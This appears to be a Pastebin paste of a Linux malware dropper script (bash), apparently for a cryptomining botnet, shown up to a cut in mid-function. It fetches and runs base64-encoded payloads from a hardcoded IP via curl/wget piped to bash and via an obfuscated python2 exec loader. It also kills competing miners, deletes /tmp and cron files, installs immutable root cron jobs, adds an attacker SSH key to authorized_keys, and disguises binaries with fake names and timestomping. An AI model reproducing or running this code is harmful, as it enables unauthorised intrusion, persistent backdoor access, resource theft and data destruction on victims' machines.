SHARE
TWEET

main1

a guest Aug 16th, 2019 88 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. SHELL=/bin/bash
  3. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  4.  
  5. ARCH=$(uname -a)
  6. if [[ -f /sbin/apk ]]; then Pref="a"; elif [[ $(echo "${ARCH}"|grep 'Alpine'|wc -l) -eq 0 ]]; then Pref="r"; else Pref="a"; fi
  7. RHOST="http://154.16.67.136/"
  8. TOR1=""
  9. TOR2=""
  10. TOR3=""
  11. RPATH1='src/ldm'
  12. RBIN1="sustse"
  13. RBIN2="sustse"
  14. RPATH2="sustse"
  15. RPATH3="sustse"
  16. RPATH2B="sustse"
  17. RPATH3B="sustse"
  18. #LPATH="${HOME-/tmp}/.cache/"
  19. CTIMEOUT="26"; TIMEOUT="75"
  20. COPTS=" -fsSLk --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
  21. WOPTS=" --quiet --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
  22. tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
  23. curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
  24. wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
  25. CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
  26. LBIN1="/usr/local/bin/nptd"
  27. LBIN2=".favicon.ico"
  28. LBIN3=".kswapd"
  29. LBIN4="/etc/cron.hourly/cronlog"
  30. LBIN5="/etc/cron.daily/cronlog"
  31. LBIN6="/etc/cron.monthly/cronlog"
  32. LBIN7="/usr/local/bin/npt"
  33. LBIN8="kthrotlds"
  34. LBIN9="${LPATH}.editorinfo"
  35. null=' >/dev/null 2>&1'
  36. skey="ssh-rsa AAAAB3NzaC1yc232EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
  37. SCN=0
  38.  
  39. function b() {
  40.     t=$(shuf -i 1-99 -n 1)
  41.     wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
  42.     if [ ${wdog0} -lt 2 ] && [ $t -lt 50 ]; then
  43.         (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash) &
  44.     fi
  45.     if [ $t -lt 21 ]; then g; fi
  46.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}"; ${sudo} kill -TERM -"${pid}"; fi; done
  47.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -vi "ssh"|grep -vi 'exim'|grep -i "kwoqwerkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}"; ${sudo} kill -TERM -"${pid}"; fi; done
  48.     ${sudo} chattr -i -a ~/.cache >/dev/null 2>&1;
  49.     if [[ "${LPATH}" != *"/tmp/"* ]]; then
  50.         ${sudo} rm -rf /tmp/* >/dev/null 2>&1
  51.         ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
  52.     else
  53.         ${sudo} rm -f /tmp/* >/dev/null 2>&1
  54.         ${sudo} rm -f /tmp/.* >/dev/null 2>&1
  55.     fi
  56.     hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3>=54.0) print $11}'|head -n 1)
  57.     [ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep "xmr\|${hload}"|while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
  58.     hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=0.0) print $2}'|uniq)
  59.     if [[ ! "${hload2}" == "" ]]; then
  60.         for p in ${hload2}; do
  61.             xm=''
  62.             if [[ $p -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then
  63.                 if [ -f /proc/${p}/exe ]; then
  64.                     xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
  65.                     xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>&1)
  66.                 elif [ -f /proc/${p}/comm ]; then
  67.                     xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
  68.                     xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>&1)
  69.                 fi
  70.                 if [[ "${xm}" == *"matches"* ]] || [[ "$(readlink /proc/${p}/exe)" == *"/tmp/"* ]] || [[ "${xmf}" == *"/tmp/"* ]]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} rm -rf ${xmf} >/dev/null 2>&1; fi
  71.             fi
  72.         done
  73.     fi
  74.     others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=4.0) print $11}')
  75.     if [  "${others}" != "" ]; then
  76.         for o in ${others}; do
  77.             okill=0
  78.             if [ -f "${o}" ]; then
  79.                 if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
  80.                 if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
  81.                 if [ ${okill} -eq 1 ]; then
  82.                     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  83.                     ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
  84.                 fi
  85.             fi
  86.         done
  87.     fi
  88.     if [[ ${sudoer} == 1 ]]; then
  89.         ${sudo} chattr -i -a -R /tmp >/dev/null 2>&1; ${sudo} chattr -i -a -R /tmp/ >/dev/null 2>&1
  90.         ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
  91.         ${sudo} echo '' >/tmp/.ld.so >/dev/null 2>&1
  92.         ${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
  93.         ${sudo} rm -rf /var/tmp/* >/dev/null 2>&1
  94.         ${sudo} rm -rf /var/tmp/.* >/dev/null 2>&1
  95.         if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
  96.         if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"3ei.xyz"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"pastebin.com/raw/"* ]]; then
  97.             ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
  98.             ${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -f /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -f /etc/cron.d/.* >/dev/null 2>&1
  99.             if [ -f /sbin/apk ]; then
  100.                 ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo -e "${C1}" > /etc/crontabs/root && ${sudo} echo -e "${C2}" >> /etc/crontabs/root && ${sudo} echo '' >> /etc/crontabs/root && ${sudo} crontab /etc/crontabs/root 2>/dev/null; ${sudo} chattr +i /etc/crontabs/root 2>/dev/null
  101.             elif [ -f /usr/bin/apt-get ]; then
  102.                 ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
  103.                 rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/crontabs/root 2>&1)
  104.                 if [[ ${rs} == "" ]]; then ${sudo} echo -e '' >> /var/spool/cron/crontabs/root 2>&1 && ${sudo} crontab /var/spool/cron/crontabs/root 2>/dev/null; fi
  105.                 ${sudo} chattr +i /var/spool/cron/crontabs/root 2>/dev/null
  106.             else
  107.                 ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
  108.                 rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/root 2>&1)
  109.                 if [[ ${rs} == "" ]]; then ${sudo} echo -e '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root 2>/dev/null; fi
  110.                 ${sudo} chattr +i /var/spool/cron/root 2>/dev/null
  111.             fi
  112.             ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo -e "${C2}" > /etc/crontab 2>&1)
  113.             if [ -z "${rs}" ]; then ${sudo} echo -e '' >> /etc/crontab && ${sudo} crontab /etc/crontab 2>/dev/null; fi
  114.             ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
  115.             rs=$(${sudo} echo -e "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo -e '' >> /etc/cron.d/root 2>&1)
  116.             #if [[ ${rs} == "" ]]; then ${sudo} crontab /etc/cron.d/root 2>/dev/null; fi
  117.             ${sudo} chattr +i /etc/crontab /etc/cron.d/root 2>/dev/null
  118.         fi
  119.  
  120.         ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1; if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
  121.         ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
  122.         if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 50 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
  123.         if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then  ${sudo} echo -e "${skey}" >> ${sshdir}/authorized_keys; fi
  124.         ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
  125.         [ $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
  126.         [ $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.tor2web.$/d' /etc/hosts >/dev/null 2>&1; }
  127.         [ $(${sudo} cat /etc/hosts|grep -i "timesync.su"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/timesync.su$/d' /etc/hosts >/dev/null 2>&1; }
  128.         [ $(${sudo} cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ] && { ${sudo} echo -e '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
  129.     else
  130.         if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]]; then
  131.             crontab -r >/dev/null 2>&1
  132.             (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
  133.         fi
  134.     fi
  135.     if [[ $(date +%M) ==  "00" ]] || [[ $(date +%M) ==  "30" ]]; then
  136.         mkdir -p ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
  137.         if [ $(which curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); ${sudo} cp "/usr/bin/${curl}" /usr/bin/curl; else curl='curl '; fi; if [ $(which wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); ${sudo} cp "/usr/bin/${wget}" /usr/bin/wget; else wget='wget '; fi
  138.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN9}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN9}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN9}) && chmod +x ${LBIN9} && $(command -v sh) ${LBIN9}
  139.     fi
  140. }
  141.  
  142. function d() {
  143.     CTIMEOUT="26"; TIMEOUT="175"
  144.     COPTS=" -fsSLk --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
  145.     WOPTS=" --quiet --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
  146.     ${sudo} rm -rf "${LPATH}*.ico*" >/dev/null 2>&1
  147.     ${sudo} rm -rf "${LPATH}r64*" >/dev/null 2>&1
  148.     ${sudo} rm -rf "${LPATH}r32*" >/dev/null 2>&1
  149.     rm -rf ${LPATH}${LBIN2} >/dev/null 2>&1
  150.     ${sudo} chattr -i ${LPATH}${LBIN3} >/dev/null 2>&1
  151.     zip=$(unzip --help 2>&1)
  152.     if [[ ${zip} == *"not found"* ]]; then
  153.         RPATH2="images/${RBIN1}"
  154.         RPATH3="images/${RBIN2}"
  155.         LBIN2="${LBIN3}"
  156.     fi
  157.     if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
  158.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2} -O ${LPATH}${LBIN2})
  159.         RBIN=${RBIN1}
  160.     else
  161.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3} -O ${LPATH}${LBIN2})
  162.         RBIN=${RBIN2}
  163.     fi
  164.     #chmod +x ${LPATH}${LBIN2}
  165.     if [[ ! ${zip} == *"not found"* ]]; then
  166.         rm -rf ${RBIN}; rm -rf ${LPATH}${LBIN3}
  167.         unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
  168.         mv ${RBIN} ${LPATH}${LBIN3}
  169.     fi
  170.     if [ ! -f ${LPATH}${LBIN3} ]; then
  171.         if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
  172.             (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2B} -O ${LPATH}${LBIN3})
  173.             RBIN=${RBIN1}
  174.         else
  175.             (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3B} -O ${LPATH}${LBIN3})
  176.             RBIN=${RBIN2}
  177.         fi
  178.     fi
  179.     chmod +x ${LPATH}${LBIN3}
  180.     echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
  181.     ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
  182.     ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1
  183.     ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  184.     ${sudo} ps aux|grep -v grep|grep -v defunct|grep -i "${grepmn}"|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" ; done
  185.     if [[ ${sudoer} == 1 ]]; then
  186.         ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  187.         ${sudo} nohup "[${grepmn}]" -c ${LPATH}wc.conf >/dev/null 2>&1 &
  188.     else
  189.         ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  190.         ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf >/dev/null 2>&1 &
  191.     fi
  192. }
  193.  
  194. function e() {
  195.     ${sudo} nohup python2 -c "import base64;exec(base64.b64decode('JTIzY29kaW5nJTNBJTIwdXRmLTglMEFpbXBvcnQlMjBiYXNlNjQlMEFpbXBvcnQlMjB1cmxsaWIyJTBBaW1wb3J0JTIwc3NsJTBBSE9TVCUzRCUyMmh0dHAlM0EvLzE1NC4xNi42Ny4xMzUvJTIyJTBBUlBBVEgxJTNEJTIyc3JjL3NjJTIyJTBBZDElM0RIT1NUKyUyMiUyMitSUEFUSDElMEFkMyUzREhPU1QrJTIyJTIyK1JQQVRIMSUwQWQyJTNESE9TVCslMjIlMjIrUlBBVEgxJTBBZGVmJTIwbGQlMjh1cmwlMkMlMjB0JTI5JTNBJTBBJTIwJTIwJTIwJTIwdHJ5JTNBJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwY3R4JTIwJTNEJTIwc3NsLmNyZWF0ZV9kZWZhdWx0X2NvbnRleHQlMjglMjklMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBjdHguY2hlY2tfaG9zdG5hbWUlMjAlM0QlMjBGYWxzZSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGN0eC52ZXJpZnlfbW9kZSUyMCUzRCUyMHNzbC5DRVJUX05PTkUlMEElMjAlMjAlMjAlMjBleGNlcHQlMjBFeGNlcHRpb24lM0ElMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBjdHglM0RGYWxzZSUwQSUyMCUyMCUyMCUyMGlmJTIwY3R4JTNBJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcGFnZSUzRGJhc2U2NC5iNjRkZWNvZGUlMjh1cmxsaWIyLnVybG9wZW4lMjh1cmwlMkN0aW1lb3V0JTNEdCUyQ2NvbnRleHQlM0RjdHglMjkucmVhZCUyOCUyOSUyOSUwQSUyMCUyMCUyMCUyMGVsc2UlM0ElMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBwYWdlJTNEYmFzZTY0LmI2NGRlY29kZSUyOHVybGxpYjIudXJsb3BlbiUyOHVybCUyQ3RpbWVvdXQlM0R0JTI5LnJlYWQlMjglMjklMjklMEElMjAlMjAlMjAlMjByZXR1cm4lMjBwYWdlJTBBdHJ5JTNBJTBBJTIwJTIwJTIwJTIwdHJ5JTNBJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcGFnZSUzRGxkJTI4ZDElMkMlMjA0MSUyOSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGV4ZWMlMjhwYWdlJTI5JTBBJTIwJTIwJTIwJTIwZXhjZXB0JTIwRXhjZXB0aW9uJTNBJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcGFnZSUzRGxkJTI4ZDIlMkMlMjA0MSUyOSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGV4ZWMlMjhwYWdlJTI5JTBBZXhjZXB0JTIwRXhjZXB0aW9uJTNBJTBBJTIwJTIwJTIwJTIwcGFnZSUzRGxkJTI4ZDMlMkMlMjA0MSUyOSUwQSUyMCUyMCUyMCUyMGV4ZWMlMjhwYWdlJTI5JTBBJTIwJTIwJTIwJTIwcGFzcw=='))" >/dev/null 2>&1 &
  196.     touch "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  197. }
  198. function c() {
  199.     ${sudo} mkdir -p /usr/local/bin >/dev/null 2>&1
  200.     ${sudo} chattr -i -a /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1; ${sudo} chmod 755 /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1
  201.     ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
  202.     ${sudo} chattr -i -a ${LBIN1} ${LBIN4} ${LBIN5} ${LBIN6} /etc/cron.d/root /etc/cron.d/.cronbus /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload >/dev/null 2>&1
  203.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN1}) && ${sudo} chmod 755 ${LBIN1} && ${sudo} touch -acmr /bin/sh ${LBIN1} && ${sudo} chattr +i ${LBIN1}
  204.     ${sudo} echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root ${LBIN1}" > /etc/crontab && ${sudo} touch -acmr /bin/sh /etc/crontab
  205.     ${sudo} echo -e "*/17 * * * * root ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /etc/cron.d/root && ${sudo} touch -acmr /bin/sh /etc/cron.d/root && ${sudo} chattr +i /etc/cron.d/root
  206.     ${sudo} echo -e "*/23 * * * * root ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /etc/cron.d/.cronbus && ${sudo} touch -acmr /bin/sh /etc/cron.d/.cronbus && ${sudo} chattr +i /etc/cron.d/.cronbus
  207.     ${sudo} echo -e "*/11 * * * * ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /var/spool/cron/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/root && ${sudo} chattr +i /var/spool/cron/root
  208.     if [ ! -f /usr/bin/yum ]; then
  209.         ${sudo} mkdir -p /var/spool/cron/crontabs
  210.         ${sudo} echo -e "*/11 * * * * ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /var/spool/cron/crontabs/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/crontabs/root && ${sudo} chattr +i /var/spool/cron/crontabs/root
  211.     fi
  212.     ${sudo} mkdir -p /etc/cron.hourly
